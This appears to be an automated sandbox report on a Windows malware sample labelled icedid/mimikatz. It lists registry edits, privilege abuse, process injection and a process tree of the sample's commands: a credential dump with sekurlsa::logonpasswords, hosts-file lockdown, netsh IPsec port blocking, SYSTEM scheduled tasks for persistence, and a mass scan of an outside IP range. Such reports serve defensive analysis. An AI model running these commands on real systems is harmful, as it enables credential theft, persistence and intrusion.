\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lqvjma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zyejeil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nusubcedp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4628 cmd.exe 2848 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023c97-6.dat nsis_installer_2 behavioral2/files/0x0007000000023ca1-15.dat nsis_installer_1 behavioral2/files/0x0007000000023ca1-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zyejeil.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zyejeil.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zyejeil.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2848 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1744 schtasks.exe 2560 schtasks.exe 3144 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2616 zyejeil.exe Token: SeDebugPrivilege 2100 zyejeil.exe Token: SeDebugPrivilege 4868 vfshost.exe Token: SeDebugPrivilege 224 ucqzmelym.exe Token: SeLockMemoryPrivilege 1432 ejzklm.exe Token: SeLockMemoryPrivilege 1432 ejzklm.exe Token: SeDebugPrivilege 1028 ucqzmelym.exe Token: SeDebugPrivilege 2992 ucqzmelym.exe Token: SeDebugPrivilege 4960 ucqzmelym.exe Token: SeDebugPrivilege 916 ucqzmelym.exe Token: SeDebugPrivilege 1208 ucqzmelym.exe Token: SeDebugPrivilege 1212 ucqzmelym.exe Token: SeDebugPrivilege 2632 ucqzmelym.exe Token: SeDebugPrivilege 1312 ucqzmelym.exe Token: SeDebugPrivilege 2016 ucqzmelym.exe Token: SeDebugPrivilege 736 ucqzmelym.exe Token: SeDebugPrivilege 4304 ucqzmelym.exe Token: SeDebugPrivilege 1928 ucqzmelym.exe Token: SeDebugPrivilege 2956 ucqzmelym.exe Token: SeDebugPrivilege 3756 ucqzmelym.exe Token: SeDebugPrivilege 372 ucqzmelym.exe Token: SeDebugPrivilege 2536 ucqzmelym.exe Token: SeDebugPrivilege 3068 ucqzmelym.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe 2616 zyejeil.exe 2616 zyejeil.exe 2100 zyejeil.exe 2100 zyejeil.exe 2804 xohudmc.exe 2920 lqvjma.exe 2264 zyejeil.exe 2264 zyejeil.exe 4828 zyejeil.exe 4828 zyejeil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3520 wrote to memory of 4628 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe 85 PID 3520 wrote to memory of 4628 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe 85 PID 3520 wrote to memory of 4628 3520 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe 85 PID 4628 wrote to memory of 2848 4628 cmd.exe 87 PID 4628 wrote to memory of 2848 4628 cmd.exe 87 PID 4628 wrote to memory of 2848 4628 cmd.exe 87 PID 4628 wrote to memory of 2616 4628 cmd.exe 89 PID 4628 wrote to memory of 2616 4628 cmd.exe 89 PID 4628 wrote to memory of 2616 4628 cmd.exe 89 PID 2100 wrote to memory of 1604 2100 zyejeil.exe 91 PID 2100 wrote to memory of 1604 2100 zyejeil.exe 91 PID 2100 wrote to memory of 1604 2100 zyejeil.exe 91 PID 1604 wrote to memory of 3848 1604 cmd.exe 93 PID 1604 wrote to memory of 3848 1604 cmd.exe 93 PID 1604 wrote to memory of 3848 1604 cmd.exe 93 PID 1604 wrote to memory of 3600 1604 cmd.exe 94 PID 1604 wrote to memory of 3600 1604 cmd.exe 94 PID 1604 wrote to memory of 3600 1604 cmd.exe 94 PID 1604 wrote to memory of 5004 1604 cmd.exe 95 PID 1604 wrote to memory of 5004 1604 cmd.exe 95 PID 1604 wrote to memory of 5004 1604 cmd.exe 95 PID 1604 wrote to memory of 2992 1604 cmd.exe 96 PID 1604 wrote to memory of 2992 1604 cmd.exe 96 PID 1604 wrote to memory of 2992 1604 cmd.exe 96 PID 1604 wrote to memory of 1496 1604 cmd.exe 97 PID 1604 wrote to memory of 1496 1604 cmd.exe 97 PID 1604 wrote to memory of 1496 1604 cmd.exe 97 PID 1604 wrote to memory of 216 1604 cmd.exe 98 PID 1604 wrote to memory of 216 1604 cmd.exe 98 PID 1604 wrote to memory of 216 1604 cmd.exe 98 PID 2100 wrote to memory of 2568 2100 zyejeil.exe 100 PID 2100 wrote to memory of 2568 2100 zyejeil.exe 100 PID 2100 wrote to memory of 2568 2100 zyejeil.exe 100 PID 2100 wrote to memory of 4876 2100 zyejeil.exe 102 PID 2100 wrote to memory of 4876 2100 zyejeil.exe 102 PID 2100 wrote to memory of 4876 2100 zyejeil.exe 102 PID 2100 wrote to memory of 60 2100 zyejeil.exe 104 PID 2100 wrote to memory of 60 2100 zyejeil.exe 104 PID 2100 wrote to memory of 60 2100 zyejeil.exe 104 PID 2100 wrote to memory of 3128 2100 zyejeil.exe 114 PID 2100 wrote to memory of 3128 2100 zyejeil.exe 114 PID 2100 wrote to memory of 3128 2100 zyejeil.exe 114 PID 3128 wrote to memory of 1568 3128 cmd.exe 116 PID 3128 wrote to memory of 1568 3128 cmd.exe 116 PID 3128 wrote to memory of 1568 3128 cmd.exe 116 PID 1568 wrote to memory of 2868 1568 wpcap.exe 117 PID 1568 wrote to memory of 2868 1568 wpcap.exe 117 PID 1568 wrote to memory of 2868 1568 wpcap.exe 117 PID 2868 wrote to memory of 2128 2868 net.exe 119 PID 2868 wrote to memory of 2128 2868 net.exe 119 PID 2868 wrote to memory of 2128 2868 net.exe 119 PID 1568 wrote to memory of 3956 1568 wpcap.exe 120 PID 1568 wrote to memory of 3956 1568 wpcap.exe 120 PID 1568 wrote to memory of 3956 1568 wpcap.exe 120 PID 3956 wrote to memory of 1976 3956 net.exe 122 PID 3956 wrote to memory of 1976 3956 net.exe 122 PID 3956 wrote to memory of 1976 3956 net.exe 122 PID 1568 wrote to memory of 2344 1568 wpcap.exe 123 PID 1568 wrote to memory of 2344 1568 wpcap.exe 123 PID 1568 wrote to memory of 2344 1568 wpcap.exe 123 PID 2344 wrote to memory of 8 2344 net.exe 125 PID 2344 wrote to memory of 8 2344 net.exe 125 PID 2344 wrote to memory of 8 2344 net.exe 125 PID 1568 wrote to memory of 1140 1568 wpcap.exe 126
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2120
-
C:\Windows\TEMP\stjqapuut\ejzklm.exe"C:\Windows\TEMP\stjqapuut\ejzklm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uzepkltb\zyejeil.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2848
-
-
C:\Windows\uzepkltb\zyejeil.exeC:\Windows\uzepkltb\zyejeil.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2616
-
-
-
C:\Windows\uzepkltb\zyejeil.exeC:\Windows\uzepkltb\zyejeil.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5004
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1496
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:216
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2568
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:60
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exeC:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:8
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1872
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1308 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4456
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:216
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt2⤵PID:1512
-
C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exeC:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lrcwzntnt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4956 -
C:\Windows\lrcwzntnt\Corporate\vfshost.exeC:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"2⤵PID:4648
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1744
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3068
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2920
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:736
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1140
-
-
